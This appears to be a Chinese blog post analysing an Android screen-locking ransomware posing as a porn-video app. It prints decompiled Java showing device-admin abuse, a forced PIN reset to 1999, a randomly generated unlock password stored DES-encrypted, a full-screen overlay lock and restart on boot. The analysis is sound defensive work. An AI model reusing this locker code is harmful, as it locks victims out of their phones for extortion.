伪色播锁机分析

打开AndridManifest.xml看看都有哪些组件

图片说明
  • Activity
    类名为com.h.M
  • Receiver
    com.h.bbb开机启动时会调用该类
    com.h.MyAdmin 激活设备管理器时调用该类
  • Service 类名为com.h.s

病毒常用的权限:

  • android.permission.SEND_SMS
    发送短信
  • android.permission.SYSTEM_ALERT_WINDOW
    置顶系统警报窗口,大部分锁机软件原理就是这样实现的。
  • android.permission.RECEIVE_BOOT_COMPLETED
    开机自启动

启动后界面如下图:

代码分析

首先来到入口点代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
public class M
extends Activity
{
private void activiteDevice()
{
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
try
{
Class localClass = Class.forName("com.h.MyAdmin");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", new ComponentName(this, localClass));
startActivityForResult(localIntent, 0);
return;
}
catch (ClassNotFoundException localClassNotFoundException)
{
throw new NoClassDefFoundError(localClassNotFoundException.getMessage());
}
}
@Override
public void onCreate(Bundle paramBundle)
{
LogCatBroadcaster.start(this);
super.onCreate(paramBundle);
activiteDevice();
}
}

函数activiteDevice为打开设备管理器激活设备。startActivityForResult打开设备管理器的界面,由接收器com.h.MyAdmin类来处理对应的激活或拒绝操作。

当用户点击激活设备管理器,就会调用onEnable来处理相关操作 在com.h.MyAdmin找到onEnable函数,调用startService来启动 com.h.s注册的服务。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
public void onEnabled(Context paramContext, Intent paramIntent)
{
String str = Integer.toString(1999);
try
{
Object localObject = Class.forName("com.h.s");
localObject = new Intent(paramContext, (Class)localObject);
((Intent)localObject).setFlags(268435456);
paramContext.startService((Intent)localObject);
getManager(paramContext).resetPassword(str, 0);
super.onEnabled(paramContext, paramIntent);
return;
}
catch (ClassNotFoundException paramContext)
{
throw new NoClassDefFoundError(paramContext.getMessage());
}
}

当你想要取消激活设备(onDisableRequested)或者改变设备管理器的pin码(onPasswordChanged)时会先把pin码设置成1999。这样想要对设备管理器进行相关操作都需要先输入pin码1999.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
@Override
public CharSequence onDisableRequested(Context paramContext, Intent paramIntent)
{
String str = Integer.toString(1999);
getManager(paramContext).lockNow();
getManager(paramContext).resetPassword(str, 0);
return super.onDisableRequested(paramContext, paramIntent);
}
@Override
public void onPasswordChanged(Context paramContext, Intent paramIntent)
{
String str = Integer.toString(1999);
getManager(paramContext).lockNow();
getManager(paramContext).resetPassword(str, 0);
super.onPasswordChanged(paramContext, paramIntent);
}

接收器com.h.MyAdmin启动了服务com.h.s,Service时先启动onCreate,然后是onStart其他,

DU为病毒作者自己写的DES加解密工具, this.passw存放着解锁密密码,((Math.random() * 100000000))-2算出, 密码被放在Flowers.xml文件里。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
public void onCreate()
{
super.onCreate();
this.pass = ((Math.random() * 100000000));
this.passw = new Long(this.pass - 2);
this.des = new DU("flower");
try
{
this.des = new DU(this.des.decrypt("c29fe56fa59ab0db"));
this.share = getSharedPreferences("Flowers", 0);
this.editor = this.share.edit();
if (this.share.getLong("m", 0) == 0)
{
this.editor.putLong("m", this.pass);
this.editor.commit();
}
}
...
}

onStart调用函数c开始锁屏,设置mWindowManager窗口管理器为系统窗口并置顶。 在OnClickListener匿名类中通过比较用户输入的数据和保存在Flowers.xml的密码来比较是否正确,如果正确,取消锁屏。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
public void onStart(Intent paramIntent, int paramInt)
{
super.onStart(paramIntent, paramInt);
c();
}
}
private void c()
{
this.wmParams = new WindowManager.LayoutParams();
Application localApplication = getApplication();
getApplication();
this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE));
this.wmParams.type = 2010;
this.wmParams.format = 1;
this.wmParams.flags = 1280;
this.wmParams.gravity = 49;
this.wmParams.x = 0;
this.wmParams.y = 0;
this.wmParams.width = -1;
this.wmParams.height = -1;
this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(2130903041, (ViewGroup)null);
this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
this.bt = ((Button)this.mFloatLayout.findViewById(2131296258));
this.ed = ((EditText)this.mFloatLayout.findViewById(2131296257));
this.tv = ((TextView)this.mFloatLayout.findViewById(2131296256));
try
{
this.ed.setHint("在这输入密码!");
this.tv.append("随机码:");
this.bt.setOnClickListener(new View.OnClickListener()
{
@Override
public void onClick(View paramAnonymousView)
{
try
{
if (s.this.ed.getText().toString().equals(s.this.des.decrypt(s.this.share.getString("passw", ""))))
{
s.access$L1000001(s.this).removeView(s.access$L1000002(s.this));
s.this.stopSelf();
}
return;
}
catch (Exception paramAnonymousView) {}
}
});
}

手机开机后,接收器com.h.bbb在onReceive再次启动com.h.s服务,即锁屏。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
public void onReceive(Context paramContext, Intent paramIntent)
{
if (paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED")) {
abortBroadcast();
}
try
{
paramIntent = Class.forName("com.h.s");
paramIntent = new Intent(paramContext, paramIntent);
paramIntent.addFlags(268435456);
paramContext.startService(paramIntent);
return;
}
catch (ClassNotFoundException paramContext)
{
throw new NoClassDefFoundError(paramContext.getMessage());
}
}
文章目录
  1. 1. 代码分析
|